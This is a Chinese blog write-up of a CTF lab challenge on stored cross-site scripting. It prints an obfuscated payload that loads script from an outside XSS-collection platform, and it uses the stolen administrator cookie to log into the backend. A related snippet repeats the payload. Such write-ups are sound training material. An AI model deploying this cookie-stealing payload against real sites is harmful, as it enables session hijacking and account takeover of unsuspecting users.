BUUCTF--BUU XSS COURSE

最新推荐文章于 2024-09-13 18:00:10 发布
最新推荐文章于 2024-09-13 18:00:10 发布
阅读量3.9k 收藏 2
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/118879248
版权

XSS漏洞 存储型XSS 安全漏洞 管理员权限 内网平台
关键词由CSDN通过智能技术生成

吐槽<img scr="javascript.:alert('xss');">可以发现这里存在一个存储型XSS漏洞

 由于靶机没法访问外网,我们使用内网xss平台

创建一个项目-->把内容都选上,将吐槽内容上传

</textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2FQFGf7n%22%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));//>

在xss平台我们可以看到有一个admin的访问记录,利用管理员的cookie,以及来访地址http://XXXXXXXXXXXXXXXXX.node3.buuoj.cn/backend/admin.php登录即可得到flag

Uzero.
关注
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
[BT]BUUCTF刷题第12天(3.31)
Bluetuan的博客
04-01 625
经过尝试,在这里不管用,要用X-Real-IPBP抓包添加(注意这一行前面不要有空行)发送后返回提示了用户名和密码,这里直接给了,登录即可成功拿到flag。
【CTF Web】BUUCTF BUU XXE COURSE 1 Writeup(JS分析+POST请求+XXE漏洞)
最新发布
HEX9CF的技术博客
09-13 783
1上课用的~
BUU XSS COURSE 1
分享
07-27 1893
BUU XSS COURSE 1
【CTF练习】BUU XSS COURSE 1(XSS获取cookie登录)
m0_73866435的博客
02-28 2827
有两个尝试点。
XSS的基础与BUU XSS COURSE 1靶场练习
L2329794714的博客
03-29 9278
二、漏洞利用与绕过方法 两个层:WAF、代码层 1、黑名单绕过 寻找没有被过滤的标签 2、双写、大小写转换 双写:在直接将一些关键字用空字符替换的时候可以用 大小写转换:过滤的时候没考虑大小写问题 2、利用标签事件 比如标签点击、聚焦、鼠标动作事件来触发代码执行 标签闭合:注入点在标签属性中,闭合标签使注入点在=变成一个独立的标签 3、HTML实体编码和js编码 html实体解析也不是在构建DOM树时解
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
网安小趴菜
09-03 6620
BUUCTF basic BUU XSS COURSE 1 & BUU XXE COURSE 1
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
xss注入讲解ppt.pptx
08-10
其中,反射型 xss 是现在最容易出现的一种 xss 漏洞,当用户访问一个带有 xss 代码的 url 请求时,服务器端接收数据后处理,然后把带有 xss 代码的数据发送到浏览器,浏览器解析这段带有 xss 代码的数据后,最终造成...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
BUU XSS COURSE 1 wp XSS平台在线注册
SCP000111的博客
04-11 1519
具体原理就是相当于我们将我们的木马放到这个网站上了,当别人访问这个网站,我们的木马就会窃取他的cookie等相关信息。那么我们应该如何搭建自己的"木马服务器"呢,这里其实网上都有教程,不过需要内网穿透,而我们老白嫖怪了,网上有个免费的在线xss测试平台,这里把链接放出来。这里就提到一个重点了,自己的XSS平台,这个东西兄弟们可以理解为一个远程木马服务器,如果有访问,我们的服务器上就会获取他的信息。则判断存在注入点,XSS注入攻击是一个很大的类,这里我仅从这题出手,这题目是存储型XSS,相关知识自行搜索。
BUUCTF通关 - 2
weixin_65279640的博客
04-14 1957
buuctf通关2
[网络安全自学篇] 2021年安全学习规划
D.T.69的博客
01-20 4597
在对2021年进行规划之前,先对2020年安全学习规划做一个总结。整体来说漏洞扫描等简单安全工作已经比较熟练,网络安全等技术术语也有一定涉及;虽然日常与运维和网络沟通较少,但日常沟通相比于2019有所提升。同时2020年也出现一个小插曲,7月一直教我技术的同事离职对我今年安全学习规划来说来说是一个不小的打击。 2021年的计划是多练习渗透测试,熟练渗透手法,多开发(python等)。在练习的过程中碰到问题再通过百度等解决,同时根据问题以点带面进行安全技术学习。欢迎各位大神提建议。谢谢。 推荐一个很.
XSS跨站脚本攻击(基础详解)
永远都没有了
01-10 3398
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
CTF做题笔记6
Forever_Han13的博客
02-20 5112
BUU XSS COURSE 1: </textarea>'"><img src=# id=xssyou style=display:none onerror=eval(unescape(/var%20b%3Ddocument.createElement%28%22script%22%29%3Bb.src%3D%22http%3A%2F%2Fxss.buuoj.cn%2F3MGcXr%22%3B%28document.getElementsByTagName%28%22HEAD%22
BUUCTF basic BUU SQL COURSE 1
网安小趴菜
08-25 1173
BUUCTF basic BUU SQL COURSE 1
BUUCTF--BUU BURP COURSE 1
qq_46263951的博客
07-09 3906
根据提示只能本地访问我们需要伪造一个本地地址 当使用X-Forwarded-For时发现并没有成功访问,e...我们尝试另一种方法 当使用X-Real-IP时我们可以成功进入 登录进去之后我们即可获得Flag 总结: 本题主要考察伪造本地地址的方法 X-Forwarded-For 和 X-Real-IP 的区别 ...
BUUCTF-Basic部分(4道)
weixin_45908624的博客
05-24 2046
buuctf
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值